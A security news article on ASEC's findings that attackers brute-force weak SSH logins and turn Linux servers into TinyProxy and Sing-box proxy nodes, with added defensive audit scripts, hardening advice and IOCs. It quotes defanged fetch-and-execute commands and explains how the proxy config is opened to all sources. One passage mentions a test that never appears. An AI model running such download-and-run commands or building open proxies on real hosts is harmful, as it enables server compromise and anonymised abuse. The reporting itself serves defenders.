Linux SSH Servers Under Siege – Hackers Deploying TinyProxy and Sing-box Proxy Tools

The AhnLab Security Intelligence Center (ASEC) has sounded the alarm over a new wave of cyberattacks targeting Linux servers with weak or default SSH credentials.

Using sophisticated honeypots, ASEC has observed a sharp rise in attacks that exploit misconfigured servers to deploy proxy tools, specifically TinyProxy and Sing-box.

Unlike traditional malware, these attacks leverage legitimate open-source software, making detection and response more challenging for system administrators.

Attackers Favor Legitimate Tools to Evade Detection

ASEC discovered that compromised Linux servers are being converted into proxy nodes with almost surgical precision.

Attackers, after brute-forcing SSH logins, execute simple yet effective commands to deploy their payloads. In one observed scenario, the following command was used to download and launch a malicious Bash script:

(wget -O s.sh hxxps://0x0[.]st/8VDs.sh || curl -o s.sh hxxps://0x0[.]st/8VDs.sh) && chmod +x s.sh && sh s.sh

This script installs TinyProxy via the system’s package manager and configures it accordingly.

By purging restrictive “Allow” and “Deny” lines and inserting “Allow 0.0.0.0/0” into the configuration file, attackers grant unrestricted external access through TinyProxy’s default port 8888.

This effectively transforms the server into an open proxy, potentially enabling a range of anonymized cyber activities, such as DDoS operations and accessing illegal content.
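The configuration change described above is easy to check for. The following POSIX shell script is an added example for defenders, not code from the ASEC report: it audits a tinyproxy.conf for the open-proxy pattern (Allow/Deny rules stripped and "Allow 0.0.0.0/0" inserted) and reports the port the proxy would expose. The sample configuration files it writes are constructed for the demonstration; the function names are this example's own. It treats a config with no Allow directives at all as open, because tinyproxy accepts every client when no Allow/Deny rules are present.

```shell
#!/bin/sh
# Added example (not from the ASEC report): audit a tinyproxy.conf for the
# open-proxy pattern described in the article. Returns 0 when client access
# is restricted, 1 when the proxy is open to any source, 2 on read error.

# audit_tinyproxy_conf FILE
audit_tinyproxy_conf() {
    conf="$1"
    [ -r "$conf" ] || { echo "cannot read $conf"; return 2; }
    open=0
    # Drop comments, then collect the effective Allow directives.
    allows=$(sed 's/#.*//' "$conf" | grep -E '^[[:space:]]*Allow[[:space:]]' || true)
    # tinyproxy listens on 8888 unless a Port directive says otherwise.
    port=$(sed 's/#.*//' "$conf" | awk '$1=="Port"{p=$2} END{print (p?p:8888)}')
    if printf '%s\n' "$allows" | grep -Eq 'Allow[[:space:]]+(0\.0\.0\.0/0|::/0)'; then
        echo "OPEN: $conf allows any source address on port $port"
        open=1
    elif [ -z "$allows" ]; then
        # With no Allow/Deny rules tinyproxy accepts all clients.
        echo "OPEN: $conf has no Allow directives (all clients accepted) on port $port"
        open=1
    else
        echo "OK: $conf restricts clients to:"
        printf '%s\n' "$allows"
    fi
    return $open
}

# write_sample_confs DIR: constructed sample configs for the demonstration.
write_sample_confs() {
    dir="$1"
    cat > "$dir/tinyproxy-default.conf" <<'EOF'
# constructed sample resembling a stock tinyproxy.conf
Port 8888
Timeout 600
Allow 127.0.0.1
Allow ::1
EOF
    cat > "$dir/tinyproxy-tampered.conf" <<'EOF'
# constructed sample of the tampered config the article describes
Port 8888
Timeout 600
Allow 0.0.0.0/0
EOF
}

# Demonstration on the constructed samples.
demo_dir=$(mktemp -d)
write_sample_confs "$demo_dir"
for f in "$demo_dir"/*.conf; do
    audit_tinyproxy_conf "$f" || true
done
rm -rf "$demo_dir"
```

On a live host, point `audit_tinyproxy_conf` at /etc/tinyproxy/tinyproxy.conf (the path Debian-family packages use) and pair it with a listener check such as `ss -ltnp | grep 8888` to confirm whether the proxy is actually bound.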

Sing-box: Multipurpose Proxy for Bypassing Geo-blocks

Another alarming case involves the deployment of Sing-box, a powerful, open-source proxy tool capable of supporting multiple advanced protocols (vmess-argo, vless-reality, Hysteria2, TUICv5). Attackers gain elevated access, then run scripts like:

bash <(curl -Ls hxxps://raw.githubusercontent[.]com/eooce/sing-box/main/sing-box.sh)

or

wget hxxps://raw.githubusercontent[.]com/eooce/ssh_tool/main/ssh_tool.sh -O ssh_tool.sh

Initially developed to bypass regional restrictions on services like ChatGPT and Netflix, Sing-box is now being exploited by threat actors who install it on foreign Virtual Private Servers (VPS) for profit or anonymity.

[Image: Sing-box GitHub page]

With unauthorized Sing-box instances, attackers can reroute their traffic, evade law enforcement, or sell proxy access on underground markets.

Recommendations: Securing Linux Against Proxy Abuse

This growing trend of abusing open-source proxies highlights the need for heightened server security. ASEC recommends that all Linux server administrators:

  • Enforce strong, regularly updated SSH passwords and disable root login where possible.
  • Patch systems promptly to close known vulnerabilities.
  • Deploy firewalls and monitor server access to restrict unwanted connections.
  • Use reputable security solutions, such as AhnLab’s V3, to detect and remediate malware early.
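The first recommendation is the one the observed attacks hinge on, and it can be verified mechanically. The POSIX shell script below is an added example for administrators, not code from ASEC or AhnLab: it reads an sshd_config file and flags the settings that leave SSH open to password brute-forcing. It goes slightly beyond the list above by also checking PasswordAuthentication and PermitEmptyPasswords, since moving to key-based logins removes the credential-guessing surface entirely. The parser mirrors sshd's rule that the first value read for a keyword wins and that keywords are case-insensitive; Match blocks are deliberately ignored (a simplification), and the defaults passed in (prohibit-password for PermitRootLogin, yes for PasswordAuthentication) are OpenSSH's upstream defaults, which some distributions override. The sample configs are constructed; the function names are this example's own.

```shell
#!/bin/sh
# Added example (not from the ASEC report): audit an sshd_config for the
# login settings that expose a host to SSH brute-forcing.

# sshd_effective FILE KEYWORD DEFAULT: print the first value set for KEYWORD,
# or DEFAULT if the file never sets it. sshd uses the first value it reads.
sshd_effective() {
    awk -v key="$2" -v def="$3" '
        /^[[:space:]]*#/ || NF == 0 { next }
        tolower($1) == "match" { exit }        # stop at the first Match block
        tolower($1) == tolower(key) && !found { print $2; found = 1 }
        END { if (!found) print def }
    ' "$1"
}

# audit_sshd_config FILE: returns 0 when hardened, 1 when a weak setting is found.
audit_sshd_config() {
    conf="$1"
    bad=0
    root=$(sshd_effective "$conf" PermitRootLogin prohibit-password)
    pw=$(sshd_effective "$conf" PasswordAuthentication yes)
    empty=$(sshd_effective "$conf" PermitEmptyPasswords no)
    [ "$root" = "no" ]  || { echo "FINDING: PermitRootLogin is '$root' (want no)"; bad=1; }
    [ "$pw" = "no" ]    || { echo "FINDING: PasswordAuthentication is '$pw' (want no; use keys)"; bad=1; }
    [ "$empty" = "no" ] || { echo "FINDING: PermitEmptyPasswords is '$empty' (want no)"; bad=1; }
    [ "$bad" -eq 0 ] && echo "OK: $conf has hardened login settings"
    return $bad
}

# write_sshd_samples DIR: constructed weak and hardened configs side by side.
write_sshd_samples() {
    dir="$1"
    cat > "$dir/sshd_config.weak" <<'EOF'
# constructed weak config: the later "PermitRootLogin no" is ignored by sshd
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PermitRootLogin no
EOF
    cat > "$dir/sshd_config.hardened" <<'EOF'
# constructed hardened config
Port 22
PermitRootLogin no
PasswordAuthentication no
PermitEmptyPasswords no
PubkeyAuthentication yes
EOF
}

# Demonstration on the constructed samples.
demo_dir=$(mktemp -d)
write_sshd_samples "$demo_dir"
for f in "$demo_dir"/sshd_config.*; do
    audit_sshd_config "$f" || true
done
rm -rf "$demo_dir"
```

On a real host, `sshd -T` (run as root) prints the fully resolved configuration including Match blocks and distribution defaults, so feeding its output to `audit_sshd_config` instead of the raw file gives a more reliable answer. The test below asserts that the weak sample is flagged, the hardened sample passes, and the first-value-wins rule is applied.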

Proactive defense and vigilant monitoring are crucial in preventing servers from being recruited into illicit proxy networks that increasingly utilize legitimate tools to evade detection.

IOCs

MD5

16d1dfa35d64046128290393512171ce

35d79027834a3b6270455f59b54f2e19

URL

https[:]//0x0[.]st/8VDs[.]sh

https[:]//raw[.]githubusercontent[.]com/eooce/sing-box/main/sing-box[.]sh

Priya
